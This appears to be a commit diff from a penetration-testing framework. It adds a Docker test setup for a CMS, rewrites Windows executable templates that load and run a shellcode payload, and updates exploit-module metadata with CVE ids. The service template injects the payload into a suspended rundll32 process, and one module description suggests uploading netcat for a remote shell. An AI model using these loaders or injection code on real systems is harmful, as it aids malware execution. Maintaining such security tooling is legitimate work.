+        libxml2-dev \
+        libwebp-dev \
+        libpng-dev \
+        libzip-dev \
+        libonig-dev \
+        libcurl4-openssl-dev && \
+    docker-php-ext-configure gd --with-webp --with-jpeg && \
+    docker-php-ext-install -j$(nproc) gd xml dom curl mbstring intl gettext zip mysqli && \
+    pecl install apcu && docker-php-ext-enable apcu && \
+    rm -rf /var/lib/apt/lists/*
+
+WORKDIR /var/www/html
+
+RUN wget https://github.com/givanz/Vvveb/releases/download/1.0.5/latest.zip && \
+    unzip latest.zip && rm latest.zip
+
+COPY php.ini /usr/local/etc/php/php.ini
@@ -0,0 +1,43 @@
+services:
+  php:
+    build: .
+    container_name: vvveb-php
+    volumes:
+      - vvveb_html:/var/www/html
+    networks:
+      - vvveb-net
+
+  nginx:
+    image: nginx:stable
+    container_name: vvveb-nginx
+    ports:
+      - "8080:80"
+    volumes:
+      - ./nginx.conf:/etc/nginx/conf.d/default.conf
+      - vvveb_html:/var/www/html:ro
+    depends_on:
+      - php
+    networks:
+      - vvveb-net
+
+  mysql:
+    image: mysql:5.7
+    container_name: vvveb-mysql
+    restart: unless-stopped
+    environment:
+      MYSQL_ROOT_PASSWORD: root
+      MYSQL_DATABASE: vvveb
+      MYSQL_USER: vvveb
+      MYSQL_PASSWORD: vvveb
+    volumes:
+      - db_data:/var/lib/mysql
+    networks:
+      - vvveb-net
+
+networks:
+  vvveb-net:
+    driver: bridge
+
+volumes:
+  db_data:
+  vvveb_html:
@@ -0,0 +1,21 @@
+server {
+    listen 80;
+    server_name localhost;
+
+    root /var/www/html;
+    index index.php index.html;
+
+    location / {
+        try_files $uri $uri/ /index.php?$args;
+    }
+
+    location ~ \.php$ {
+        try_files $uri =404;
+        fastcgi_split_path_info ^(.+\.php)(/.+)$;
+        fastcgi_pass php:9000;
+        fastcgi_index index.php;
+        include fastcgi_params;
+        fastcgi_param SCRIPT_FILENAME $document_root$fastcgi_script_name;
+        fastcgi_param PATH_INFO $fastcgi_path_info;
+    }
+}
@@ -0,0 +1,5 @@
+display_errors = On
+memory_limit = 512M
+upload_max_filesize = 64M
+post_max_size = 64M
+max_execution_time = 300
@@ -1,8 +1,8 @@
 # PE Source Code
 This directory contains the source code for the PE executable templates.

-## Building DLLs
-Use the provided `build_dlls.bat` file, and run it from within the Visual Studio
+## Building
+Use the provided `build_all.bat` file, and run it from within the Visual Studio
 developer console. The batch file requires that the `%VCINSTALLDIR%` environment
 variable be defined (which it should be by default). The build script will
 create both the x86 and x64 templates before moving them into the correct
@@ -0,0 +1,17 @@
+@echo off
+
+echo Compiling DLLs
+
+for /D %%d in (dll*) do (
+  pushd "%%d"
+  call build.bat
+  popd
+)
+
+echo Compiling EXEs
+
+for /D %%e in (exe*) do (
+  pushd "%%e"
+  call build.bat
+  popd
+)
@@ -1,7 +0,0 @@
-@echo off
-
-for /D %%d in (dll*) do (
-  pushd "%%d"
-  build.bat
-  popd
-)
@@ -3,6 +3,7 @@
 if "%~1"=="" GOTO NO_ARGUMENTS
 echo Compiling for: %1
 call "%VCINSTALLDIR%Auxiliary\Build\vcvarsall.bat" %1
+rem mscoree.lib requires .NET SDK to be installed, add it as a Visual Studio component
 cl /CLR /LD /GS- /I ..\dll /DBUILDMODE=2 template.cpp /Fe:template_%1_windows_mixed_mode.dll /link mscoree.lib kernel32.lib /entry:DllMain /subsystem:WINDOWS
 cl /CLR /LD /GS- /I ..\dll /DBUILDMODE=2 /DSCSIZE=262144 template.cpp /Fe:template_%1_windows_mixed_mode.256kib.dll /link mscoree.lib kernel32.lib /entry:DllMain /subsystem:WINDOWS
 exit /B
@@ -0,0 +1,13 @@
+@echo off
+
+if "%~1"=="" GOTO NO_ARGUMENTS
+echo Compiling for: %1
+call "%VCINSTALLDIR%Auxiliary\Build\vcvarsall.bat" %1
+cl /GS- template.c /Fe:template_%1_windows.exe /link kernel32.lib /entry:main /subsystem:WINDOWS /NODEFAULTLIB
+exit /B
+
+:NO_ARGUMENTS
+%COMSPEC% /c "%0" x86
+%COMSPEC% /c "%0" x64
+del  *.obj *.res
+move *.exe ..\..\..
@@ -1,26 +0,0 @@
-
-Microsoft Visual Studio Solution File, Format Version 10.00
-# Visual C++ Express 2008
-Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "service", "service.vcproj", "{BED052CD-AD84-45E2-9F9D-2C1D8FE4813F}"
-EndProject
-Global
-	GlobalSection(SolutionConfigurationPlatforms) = preSolution
-		Release|Win32 = Release|Win32
-		Release|x64 = Release|x64
-		Debug|Win32 = Debug|Win32
-		Debug|x64 = Debug|x64
-	EndGlobalSection
-	GlobalSection(ProjectConfigurationPlatforms) = postSolution
-		{BED052CD-AD84-45E2-9F9D-2C1D8FE4813F}.Release|Win32.ActiveCfg = Release|Win32
-		{BED052CD-AD84-45E2-9F9D-2C1D8FE4813F}.Release|Win32.Build.0 = Release|Win32
-		{BED052CD-AD84-45E2-9F9D-2C1D8FE4813F}.Release|x64.ActiveCfg = Release|x64
-		{BED052CD-AD84-45E2-9F9D-2C1D8FE4813F}.Release|x64.Build.0 = Release|x64
-		{BED052CD-AD84-45E2-9F9D-2C1D8FE4813F}.Debug|Win32.ActiveCfg = Release|Win32
-		{BED052CD-AD84-45E2-9F9D-2C1D8FE4813F}.Debug|Win32.Build.0 = Release|Win32
-		{BED052CD-AD84-45E2-9F9D-2C1D8FE4813F}.Debug|x64.ActiveCfg = Debug|x64
-		{BED052CD-AD84-45E2-9F9D-2C1D8FE4813F}.Debug|x64.Build.0 = Debug|x64
-	EndGlobalSection
-	GlobalSection(SolutionProperties) = preSolution
-		HideSolutionNode = FALSE
-	EndGlobalSection
-EndGlobal
@@ -1,343 +0,0 @@
-<?xml version="1.0" encoding="Windows-1252"?>
-<VisualStudioProject
-	ProjectType="Visual C++"
-	Version="9.00"
-	Name="service"
-	ProjectGUID="{BED052CD-AD84-45E2-9F9D-2C1D8FE4813F}"
-	RootNamespace="service"
-	Keyword="Win32Proj"
-	TargetFrameworkVersion="196613"
-	>
-	<Platforms>
-		<Platform
-			Name="Win32"
-		/>
-		<Platform
-			Name="x64"
-		/>
-	</Platforms>
-	<ToolFiles>
-	</ToolFiles>
-	<Configurations>
-		<Configuration
-			Name="Debug|Win32"
-			OutputDirectory="$(SolutionDir)$(ConfigurationName)"
-			IntermediateDirectory="$(ConfigurationName)"
-			ConfigurationType="1"
-			CharacterSet="1"
-			>
-			<Tool
-				Name="VCPreBuildEventTool"
-			/>
-			<Tool
-				Name="VCCustomBuildTool"
-			/>
-			<Tool
-				Name="VCXMLDataGeneratorTool"
-			/>
-			<Tool
-				Name="VCWebServiceProxyGeneratorTool"
-			/>
-			<Tool
-				Name="VCMIDLTool"
-			/>
-			<Tool
-				Name="VCCLCompilerTool"
-				Optimization="0"
-				PreprocessorDefinitions="WIN32;_DEBUG;_WINDOWS"
-				MinimalRebuild="true"
-				BasicRuntimeChecks="3"
-				RuntimeLibrary="3"
-				UsePrecompiledHeader="0"
-				WarningLevel="3"
-				DebugInformationFormat="4"
-			/>
-			<Tool
-				Name="VCManagedResourceCompilerTool"
-			/>
-			<Tool
-				Name="VCResourceCompilerTool"
-			/>
-			<Tool
-				Name="VCPreLinkEventTool"
-			/>
-			<Tool
-				Name="VCLinkerTool"
-				LinkIncremental="2"
-				GenerateDebugInformation="true"
-				SubSystem="2"
-				TargetMachine="1"
-			/>
-			<Tool
-				Name="VCALinkTool"
-			/>
-			<Tool
-				Name="VCManifestTool"
-			/>
-			<Tool
-				Name="VCXDCMakeTool"
-			/>
-			<Tool
-				Name="VCBscMakeTool"
-			/>
-			<Tool
-				Name="VCFxCopTool"
-			/>
-			<Tool
-				Name="VCAppVerifierTool"
-			/>
-			<Tool
-				Name="VCPostBuildEventTool"
-			/>
-		</Configuration>
-		<Configuration
-			Name="Debug|x64"
-			OutputDirectory="$(SolutionDir)$(PlatformName)\$(ConfigurationName)"
-			IntermediateDirectory="$(PlatformName)\$(ConfigurationName)"
-			ConfigurationType="1"
-			CharacterSet="1"
-			>
-			<Tool
-				Name="VCPreBuildEventTool"
-			/>
-			<Tool
-				Name="VCCustomBuildTool"
-			/>
-			<Tool
-				Name="VCXMLDataGeneratorTool"
-			/>
-			<Tool
-				Name="VCWebServiceProxyGeneratorTool"
-			/>
-			<Tool
-				Name="VCMIDLTool"
-				TargetEnvironment="3"
-			/>
-			<Tool
-				Name="VCCLCompilerTool"
-				Optimization="0"
-				PreprocessorDefinitions="WIN32;_DEBUG;_WINDOWS"
-				MinimalRebuild="true"
-				BasicRuntimeChecks="3"
-				RuntimeLibrary="3"
-				UsePrecompiledHeader="0"
-				WarningLevel="3"
-				DebugInformationFormat="3"
-			/>
-			<Tool
-				Name="VCManagedResourceCompilerTool"
-			/>
-			<Tool
-				Name="VCResourceCompilerTool"
-			/>
-			<Tool
-				Name="VCPreLinkEventTool"
-			/>
-			<Tool
-				Name="VCLinkerTool"
-				LinkIncremental="2"
-				GenerateDebugInformation="true"
-				SubSystem="2"
-				TargetMachine="17"
-			/>
-			<Tool
-				Name="VCALinkTool"
-			/>
-			<Tool
-				Name="VCManifestTool"
-			/>
-			<Tool
-				Name="VCXDCMakeTool"
-			/>
-			<Tool
-				Name="VCBscMakeTool"
-			/>
-			<Tool
-				Name="VCFxCopTool"
-			/>
-			<Tool
-				Name="VCAppVerifierTool"
-			/>
-			<Tool
-				Name="VCPostBuildEventTool"
-			/>
-		</Configuration>
-		<Configuration
-			Name="Release|Win32"
-			OutputDirectory="$(SolutionDir)$(ConfigurationName)"
-			IntermediateDirectory="$(ConfigurationName)"
-			ConfigurationType="1"
-			CharacterSet="2"
-			WholeProgramOptimization="1"
-			>
-			<Tool
-				Name="VCPreBuildEventTool"
-			/>
-			<Tool
-				Name="VCCustomBuildTool"
-			/>
-			<Tool
-				Name="VCXMLDataGeneratorTool"
-			/>
-			<Tool
-				Name="VCWebServiceProxyGeneratorTool"
-			/>
-			<Tool
-				Name="VCMIDLTool"
-			/>
-			<Tool
-				Name="VCCLCompilerTool"
-				Optimization="1"
-				EnableIntrinsicFunctions="true"
-				FavorSizeOrSpeed="2"
-				PreprocessorDefinitions="WIN32;NDEBUG;_WINDOWS"
-				RuntimeLibrary="0"
-				BufferSecurityCheck="false"
-				EnableFunctionLevelLinking="true"
-				UsePrecompiledHeader="0"
-				WarningLevel="3"
-				DebugInformationFormat="3"
-				CallingConvention="2"
-				CompileAs="1"
-			/>
-			<Tool
-				Name="VCManagedResourceCompilerTool"
-			/>
-			<Tool
-				Name="VCResourceCompilerTool"
-			/>
-			<Tool
-				Name="VCPreLinkEventTool"
-			/>
-			<Tool
-				Name="VCLinkerTool"
-				OutputFile="../../../../service.exe"
-				LinkIncremental="1"
-				GenerateManifest="false"
-				GenerateDebugInformation="false"
-				SubSystem="2"
-				OptimizeReferences="2"
-				EnableCOMDATFolding="2"
-				TargetMachine="1"
-			/>
-			<Tool
-				Name="VCALinkTool"
-			/>
-			<Tool
-				Name="VCManifestTool"
-			/>
-			<Tool
-				Name="VCXDCMakeTool"
-			/>
-			<Tool
-				Name="VCBscMakeTool"
-			/>
-			<Tool
-				Name="VCFxCopTool"
-			/>
-			<Tool
-				Name="VCAppVerifierTool"
-			/>
-			<Tool
-				Name="VCPostBuildEventTool"
-			/>
-		</Configuration>
-		<Configuration
-			Name="Release|x64"
-			OutputDirectory="$(SolutionDir)$(PlatformName)\$(ConfigurationName)"
-			IntermediateDirectory="$(PlatformName)\$(ConfigurationName)"
-			ConfigurationType="1"
-			CharacterSet="2"
-			WholeProgramOptimization="1"
-			>
-			<Tool
-				Name="VCPreBuildEventTool"
-			/>
-			<Tool
-				Name="VCCustomBuildTool"
-			/>
-			<Tool
-				Name="VCXMLDataGeneratorTool"
-			/>
-			<Tool
-				Name="VCWebServiceProxyGeneratorTool"
-			/>
-			<Tool
-				Name="VCMIDLTool"
-				TargetEnvironment="3"
-			/>
-			<Tool
-				Name="VCCLCompilerTool"
-				Optimization="1"
-				EnableIntrinsicFunctions="true"
-				FavorSizeOrSpeed="2"
-				PreprocessorDefinitions="WIN32;NDEBUG;_WINDOWS"
-				RuntimeLibrary="0"
-				BufferSecurityCheck="false"
-				EnableFunctionLevelLinking="true"
-				UsePrecompiledHeader="0"
-				WarningLevel="3"
-				DebugInformationFormat="3"
-				CallingConvention="2"
-				CompileAs="1"
-			/>
-			<Tool
-				Name="VCManagedResourceCompilerTool"
-			/>
-			<Tool
-				Name="VCResourceCompilerTool"
-			/>
-			<Tool
-				Name="VCPreLinkEventTool"
-			/>
-			<Tool
-				Name="VCLinkerTool"
-				OutputFile="../../../../template_x64_windows_svc.exe"
-				LinkIncremental="1"
-				GenerateManifest="false"
-				GenerateDebugInformation="false"
-				SubSystem="2"
-				OptimizeReferences="2"
-				EnableCOMDATFolding="2"
-				TargetMachine="17"
-			/>
-			<Tool
-				Name="VCALinkTool"
-			/>
-			<Tool
-				Name="VCManifestTool"
-			/>
-			<Tool
-				Name="VCXDCMakeTool"
-			/>
-			<Tool
-				Name="VCBscMakeTool"
-			/>
-			<Tool
-				Name="VCFxCopTool"
-			/>
-			<Tool
-				Name="VCAppVerifierTool"
-			/>
-			<Tool
-				Name="VCPostBuildEventTool"
-			/>
-		</Configuration>
-	</Configurations>
-	<References>
-	</References>
-	<Files>
-		<Filter
-			Name="Source Files"
-			Filter="cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx"
-			UniqueIdentifier="{4FC737F1-C7A5-4376-A066-2A32D752A2FF}"
-			>
-			<File
-				RelativePath=".\service.c"
-				>
-			</File>
-		</Filter>
-	</Files>
-	<Globals>
-	</Globals>
-</VisualStudioProject>
@@ -1,11 +1,11 @@
-#include <stdio.h>
+#include <windows.h>

 #define SCSIZE 4096
-char payload[SCSIZE] = "PAYLOAD:";
+char bPayload[SCSIZE] = "PAYLOAD:";

-char comment[512] = "";
-
-int main(int argc, char **argv) {
-	(*(void (*)()) payload)();
-	return(0);
+void main() {
+	DWORD dwOldProtect;
+	VirtualProtect(bPayload, SCSIZE, PAGE_EXECUTE_READWRITE, &dwOldProtect);
+	(*(void (*)()) bPayload)();
+	return;
 }
@@ -1,32 +0,0 @@
-; Author: Stephen Fewer (stephen_fewer[at]harmonysecurity[dot]com)
-; Architecture: x64
-;
-; Assemble and link with the following command:
-; "C:\Program Files\Microsoft Visual Studio 9.0\VC\bin\x86_amd64\ml64" template_x64_windows.asm /link /subsystem:windows /defaultlib:"C:\Program Files\Microsoft SDKs\Windows\v6.0A\Lib\x64\kernel32.lib" /entry:main 
-
-extrn ExitProcess : proc
-extrn VirtualAlloc : proc
-
-.code
-
-	main proc 
-		sub rsp, 40        ;
-		mov r9, 40h        ; 
-		mov r8, 3000h      ; 
-		mov rdx, 4096      ; 
-		xor rcx, rcx       ; 
-		call VirtualAlloc  ; lpPayload = VirtualAlloc( NULL, 4096, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE );
-		mov rcx, 4096      ;
-		mov rsi, payload   ;
-		mov rdi, rax       ;
-		rep movsb          ; memcpy( lpPayload, payload, 4096 );
-		call rax           ; lpPayload();
-		xor rcx, rcx       ;
-		call ExitProcess   ; ExitProcess( 0 );
-	main endp
-	
-	payload proc
-		A byte 'PAYLOAD:'
-		B db 4096-8 dup ( 0 )
-	payload endp
-end
@@ -0,0 +1,13 @@
+@echo off
+
+if "%~1"=="" GOTO NO_ARGUMENTS
+echo Compiling for: %1
+call "%VCINSTALLDIR%Auxiliary\Build\vcvarsall.bat" %1
+cl /GS- /DBUILDMODE=2 template.c /Fe:template_%1_windows_svc.exe /link advapi32.lib kernel32.lib /entry:main /subsystem:WINDOWS /NODEFAULTLIB
+exit /B
+
+:NO_ARGUMENTS
+%COMSPEC% /c "%0" x86
+%COMSPEC% /c "%0" x64
+del  *.obj *.res
+move *.exe ..\..\..
@@ -1,16 +1,28 @@
 #define WIN32_LEAN_AND_MEAN
 #include <windows.h>

-#define PAYLOAD_SIZE	8192
+#define SCSIZE 8192

 char cServiceName[32] = "SERVICENAME";

-char bPayload[PAYLOAD_SIZE] = "PAYLOAD:";
+char bPayload[SCSIZE] = "PAYLOAD:";

 SERVICE_STATUS ss;

 SERVICE_STATUS_HANDLE hStatus = NULL;

+#if BUILDMODE == 2
+/* hand-rolled bzero allows us to avoid including ms vc runtime */
+void inline_bzero(void *p, size_t l)
+{
+	BYTE *q = (BYTE *)p;
+	size_t x = 0;
+	for (x = 0; x < l; x++)
+		*(q++) = 0x00;
+}
+
+#endif
+
 /*
 *
 */
@@ -34,9 +46,9 @@ VOID ServiceMain( DWORD dwNumServicesArgs, LPSTR * lpServiceArgVectors )
 	PROCESS_INFORMATION pi;
 	LPVOID lpPayload = NULL;

-	ZeroMemory( &ss, sizeof(SERVICE_STATUS) );
-	ZeroMemory( &si, sizeof(STARTUPINFO) );
-	ZeroMemory( &pi, sizeof(PROCESS_INFORMATION) );
+	inline_bzero( &ss, sizeof(SERVICE_STATUS) );
+	inline_bzero( &si, sizeof(STARTUPINFO) );
+	inline_bzero( &pi, sizeof(PROCESS_INFORMATION) );

 	si.cb = sizeof(STARTUPINFO);

@@ -47,7 +59,7 @@ VOID ServiceMain( DWORD dwNumServicesArgs, LPSTR * lpServiceArgVectors )
 	ss.dwControlsAccepted = SERVICE_ACCEPT_STOP|SERVICE_ACCEPT_SHUTDOWN;

 	hStatus = RegisterServiceCtrlHandler( (LPCSTR)&cServiceName, (LPHANDLER_FUNCTION)ServiceHandler );
-  
+
 	if ( hStatus )
 	{
 		ss.dwCurrentState = SERVICE_RUNNING;
@@ -57,30 +69,30 @@ VOID ServiceMain( DWORD dwNumServicesArgs, LPSTR * lpServiceArgVectors )
 		if( CreateProcess( NULL, "rundll32.exe", NULL, NULL, FALSE, CREATE_SUSPENDED, NULL, NULL, &si, &pi ) )
 		{
 			Context.ContextFlags = CONTEXT_FULL;
-		  
+
 			GetThreadContext( pi.hThread, &Context );
-		  
-			lpPayload = VirtualAllocEx( pi.hProcess, NULL, PAYLOAD_SIZE, MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE );
+
+			lpPayload = VirtualAllocEx( pi.hProcess, NULL, SCSIZE, MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE );
 			if( lpPayload )
 			{
-				WriteProcessMemory( pi.hProcess, lpPayload, &bPayload, PAYLOAD_SIZE, NULL );
+				WriteProcessMemory( pi.hProcess, lpPayload, &bPayload, SCSIZE, NULL );
 #ifdef _WIN64
-				Context.Rip = (DWORD64)lpPayload;
+				Context.Rip = (ULONG_PTR)lpPayload;
 #else
-				Context.Eip = (DWORD)lpPayload;
+				Context.Eip = (ULONG_PTR)lpPayload;
 #endif
 				SetThreadContext( pi.hThread, &Context );
 			}

 			ResumeThread( pi.hThread );
-			
+
 			CloseHandle( pi.hThread );
-		  
+
 			CloseHandle( pi.hProcess );
 		}
-		
+
 		ServiceHandler( SERVICE_CONTROL_STOP );
-		
+
 		ExitProcess( 0 );
 	}
 }
@@ -88,12 +100,13 @@ VOID ServiceMain( DWORD dwNumServicesArgs, LPSTR * lpServiceArgVectors )
 /*
 *
 */
-int __stdcall WinMain( HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nCmdShow )
+void main()
 {
-	SERVICE_TABLE_ENTRY st[] = 
-    { 
-        { (LPSTR)&cServiceName, (LPSERVICE_MAIN_FUNCTIONA)&ServiceMain }, 
-        { NULL, NULL } 
-    };
-	return StartServiceCtrlDispatcher( (SERVICE_TABLE_ENTRY *)&st );
+	SERVICE_TABLE_ENTRY st[] =
+		{
+			{ (LPSTR)&cServiceName, (LPSERVICE_MAIN_FUNCTIONA)&ServiceMain },
+			{ NULL, NULL }
+		};
+	StartServiceCtrlDispatcher( (SERVICE_TABLE_ENTRY *)&st );
+	return;
 }
@@ -837,7 +837,7 @@
      "Spencer McIntyre",
      "jheysel-r7"
    ],
-    "description": "This module exploits Active Directory Certificate Services (AD CS) template misconfigurations, specifically\n          ESC9, ESC10, and ESC16, by updating an LDAP object and requesting a certificate on behalf of a target user.\n          The module leverages the auxiliary/admin/ldap/ldap_object_attribute module to update the LDAP object and the\n          admin/ldap/shadow_credentials module to add shadow credentials for the target user. It then uses the\n          admin/kerberos/get_ticket module to retrieve the NTLM hash of the target user and requests a certificate via\n          MS-ICPR. The resulting certificate can be used for various operations, such as authentication.\n\n          The module ensures that any changes made by the ldap_object_attribute or shadow_credentials module are\n          reverted after execution to maintain system integrity.",
+    "description": "This module exploits Active Directory Certificate Services (AD CS) template misconfigurations, specifically\n          ESC9, ESC10, and ESC16, by updating an LDAP object and requesting a certificate on behalf of a target user.\n          The module leverages the auxiliary/admin/ldap/ldap_object_attribute module to update the LDAP object and the\n          admin/ldap/shadow_credentials module to add shadow credentials for the target user if the target password is\n          not provided. It then uses the admin/kerberos/get_ticket module to retrieve the NTLM hash of the target user\n          and requests a certificate via MS-ICPR. The resulting certificate can be used for various operations, such as\n          authentication.\n\n          The module ensures that any changes made by the ldap_object_attribute or shadow_credentials module are\n          reverted after execution to maintain system integrity.",
    "references": [
      "URL-https://github.com/GhostPack/Certify",
      "URL-https://github.com/ly4k/Certipy",
@@ -856,7 +856,7 @@
      "microsoft-ds"
    ],
    "targets": null,
-    "mod_time": "2025-07-30 15:28:56 +0000",
+    "mod_time": "2025-10-02 18:14:00 +0000",
    "path": "/modules/auxiliary/admin/dcerpc/esc_update_ldap_object.rb",
    "is_install_path": true,
    "ref_name": "admin/dcerpc/esc_update_ldap_object",
@@ -2125,6 +2125,7 @@
    ],
    "description": "This module abuses the 'mimencode' binary present within\n        ContentKeeper Web filtering appliances to retrieve arbitrary\n        files outside of the webroot.",
    "references": [
+      "CVE-2009-10005",
      "OSVDB-54551",
      "URL-http://www.aushack.com/200904-contentkeeper.txt"
    ],
@@ -2147,7 +2148,7 @@
      "https"
    ],
    "targets": null,
-    "mod_time": "2025-05-16 01:16:37 +0000",
+    "mod_time": "2025-10-06 17:15:11 +0000",
    "path": "/modules/auxiliary/admin/http/contentkeeper_fileaccess.rb",
    "is_install_path": true,
    "ref_name": "admin/http/contentkeeper_fileaccess",
@@ -2179,6 +2180,7 @@
    ],
    "description": "This module exploits an OS Command Injection vulnerability in some D-Link\n          Routers like the DIR-600 rev B and the DIR-300 rev B. The vulnerability exists in\n          command.php, which is accessible without authentication. This module has been\n          tested with the versions DIR-600 2.14b01 and below, DIR-300 rev B 2.13 and below.\n          In order to get a remote shell the telnetd could be started without any\n          authentication.",
    "references": [
+      "CVE-2013-10069",
      "OSVDB-89861",
      "EDB-24453",
      "URL-https://eu.dlink.com/uk/en/products/dir-600-wireless-n-150-home-router",
@@ -2204,7 +2206,7 @@
      "https"
    ],
    "targets": null,
-    "mod_time": "2025-05-16 01:16:37 +0000",
+    "mod_time": "2025-10-06 17:15:11 +0000",
    "path": "/modules/auxiliary/admin/http/dlink_dir_300_600_exec_noauth.rb",
    "is_install_path": true,
    "ref_name": "admin/http/dlink_dir_300_600_exec_noauth",
@@ -3458,6 +3460,7 @@
    ],
    "description": "This module exploits an unauthenticated file download vulnerability\n          in limesurvey between 2.0+ and 2.06+ Build 151014. The file is downloaded\n          as a ZIP and unzipped automatically, thus binary files can be downloaded.",
    "references": [
+      "CVE-2025-34120",
      "URL-https://sec-consult.com/vulnerability-lab/advisory/multiple-critical-vulnerabilities-in-lime-survey/",
      "URL-https://www.limesurvey.org/blog/22-security/136-limesurvey-security-advisory-10-2015",
      "URL-https://github.com/LimeSurvey/LimeSurvey/compare/2.06_plus_151014...2.06_plus_151016?w=1"
@@ -3481,7 +3484,7 @@
      "https"
    ],
    "targets": null,
-    "mod_time": "2025-05-16 01:16:37 +0000",
+    "mod_time": "2025-10-06 17:15:11 +0000",
    "path": "/modules/auxiliary/admin/http/limesurvey_file_download.rb",
    "is_install_path": true,
    "ref_name": "admin/http/limesurvey_file_download",
@@ -3513,6 +3516,7 @@
    ],
    "description": "Some Linksys Routers are vulnerable to an authenticated OS command injection.\n          Default credentials for the web interface are admin/admin or admin/password. Since\n          it is a blind os command injection vulnerability, there is no output for the\n          executed command. A ping command against a controlled system for can be used for\n          testing purposes.",
    "references": [
+      "CVE-2018-3953",
      "OSVDB-89912",
      "BID-57760",
      "EDB-24475",
@@ -3537,7 +3541,7 @@
      "https"
    ],
    "targets": null,
-    "mod_time": "2025-05-16 01:16:37 +0000",
+    "mod_time": "2025-10-06 17:15:11 +0000",
    "path": "/modules/auxiliary/admin/http/linksys_e1500_e2500_exec.rb",
    "is_install_path": true,
    "ref_name": "admin/http/linksys_e1500_e2500_exec",
@@ -3570,6 +3574,7 @@
    ],
    "description": "This module exploits a stack-based buffer overflow vulnerability in the WRT120N Linksys router\n          to reset the password of the management interface temporarily to an empty value.\n          This module has been tested successfully on a WRT120N device with firmware version\n          1.0.07.",
    "references": [
+      "CVE-2014-125122",
      "EDB-31758",
      "OSVDB-103521",
      "URL-https://web.archive.org/web/20210424073058/http://www.devttys0.com/2014/02/wrt120n-fprintf-stack-overflow/"
@@ -3593,7 +3598,7 @@
      "https"
    ],
    "targets": null,
-    "mod_time": "2025-05-16 01:16:37 +0000",
+    "mod_time": "2025-10-06 17:15:11 +0000",
    "path": "/modules/auxiliary/admin/http/linksys_tmunblock_admin_reset_bof.rb",
    "is_install_path": true,
    "ref_name": "admin/http/linksys_tmunblock_admin_reset_bof",
@@ -3626,6 +3631,7 @@
    ],
    "description": "Some Linksys Routers are vulnerable to OS Command injection.\n          You will need credentials to the web interface to access the vulnerable part\n          of the application.\n          Default credentials are always a good starting point. admin/admin or admin\n          and blank password could be a first try.\n          Note: This is a blind OS command injection vulnerability. This means that\n          you will not see any output of your command. Try a ping command to your\n          local system and observe the packets with tcpdump (or equivalent) for a first test.\n\n          Hint: To get a remote shell you could upload a netcat binary and exec it.\n          WARNING: this module will overwrite network and DHCP configuration.",
    "references": [
+      "CVE-2023-31742",
      "URL-http://www.s3cur1ty.de/m1adv2013-01",
      "URL-http://www.s3cur1ty.de/attacking-linksys-wrt54gl",
      "EDB-24202",
@@ -3651,7 +3657,7 @@
      "https"
    ],
    "targets": null,
-    "mod_time": "2025-05-16 01:16:37 +0000",
+    "mod_time": "2025-10-06 17:15:11 +0000",
    "path": "/modules/auxiliary/admin/http/linksys_wrt54gl_exec.rb",
    "is_install_path": true,
    "ref_name": "admin/http/linksys_wrt54gl_exec",
@@ -4145,6 +4151,7 @@
    ],
    "description": "This module targets an authentication bypass vulnerability in the mini_http binary of several Netgear Routers\n          running firmware versions prior to 1.2.0.88, 1.0.1.80, 1.1.0.110, and 1.1.0.84. The vulnerability allows\n          unauthenticated attackers to reveal the password for the admin user that is used to log into the\n          router's administrative portal, in plaintext.\n\n          Once the password has been been obtained, the exploit enables telnet on the target router and then utiltizes\n          the auxiliary/scanner/telnet/telnet_login module to log into the router using the stolen credentials of the\n          admin user. This will result in the attacker obtaining a new telnet session as the \"root\" user.\n\n          This vulnerability was discovered and exploited by an independent security researcher who reported it to SSD.",
    "references": [
+      "CVE-2021-45511",
      "URL-https://kb.netgear.com/000063961/Security-Advisory-for-Authentication-Bypass-Vulnerability-on-the-D7000-and-Some-Routers-PSV-2021-0133",
      "URL-https://ssd-disclosure.com/ssd-advisory-netgear-d7000-authentication-bypass/"
    ],
@@ -4167,7 +4174,7 @@
      "https"
    ],
    "targets": null,
-    "mod_time": "2024-07-24 16:42:43 +0000",
+    "mod_time": "2025-10-07 14:03:32 +0000",
    "path": "/modules/auxiliary/admin/http/netgear_pnpx_getsharefolderlist_auth_bypass.rb",
    "is_install_path": true,
    "ref_name": "admin/http/netgear_pnpx_getsharefolderlist_auth_bypass",
@@ -6073,6 +6080,7 @@
    ],
    "description": "This module exploits an unauthenticated arbitrary wordpress options change vulnerability\n          in the Automatic (wp-automatic) plugin <= 3.53.2. If WPEMAIL is provided, the administrator's email\n          address will be changed. User registration is\n          enabled, and default user role is set to administrator. A user is then created with\n          the USER name set. A valid EMAIL is required to get the registration email (not handled in MSF).",
    "references": [
+      "CVE-2021-4374",
      "URL-https://blog.nintechnet.com/critical-vulnerability-fixed-in-wordpress-automatic-plugin/"
    ],
    "platform": "PHP",
@@ -6094,7 +6102,7 @@
      "https"
    ],
    "targets": null,
-    "mod_time": "2022-10-03 19:50:04 +0000",
+    "mod_time": "2025-10-06 17:15:11 +0000",
    "path": "/modules/auxiliary/admin/http/wp_automatic_plugin_privesc.rb",
    "is_install_path": true,
    "ref_name": "admin/http/wp_automatic_plugin_privesc",
@@ -6519,6 +6527,7 @@
    ],
    "description": "The WordPress WPLMS theme from version 1.5.2 to 1.8.4.1 allows an\n          authenticated user of any user level to set any system option due to a lack of\n          validation in the import_data function of /includes/func.php.\n\n          The module first changes the admin e-mail address to prevent any\n          notifications being sent to the actual administrator during the attack,\n          re-enables user registration in case it has been disabled and sets the default\n          role to be administrator.  This will allow for the user to create a new account\n          with admin privileges via the default registration page found at\n          /wp-login.php?action=register.",
    "references": [
+      "CVE-2015-10139",
      "WPVDB-7785"
    ],
    "platform": "",
@@ -6540,7 +6549,7 @@
      "https"
    ],
    "targets": null,
-    "mod_time": "2025-05-16 01:16:37 +0000",
+    "mod_time": "2025-10-06 17:15:11 +0000",
    "path": "/modules/auxiliary/admin/http/wp_wplms_privilege_escalation.rb",
    "is_install_path": true,
    "ref_name": "admin/http/wp_wplms_privilege_escalation",
@@ -9795,6 +9804,7 @@
    ],
    "description": "This module exploits a vulnerability in the FOLD command of the\n          University of Washington ipop2d service. By specifying an arbitrary\n          folder name it is possible to retrieve any file which is world or group\n          readable by the user ID of the POP account. This vulnerability can only\n          be exploited with a valid username and password. The From address is\n          the file owner.",
    "references": [
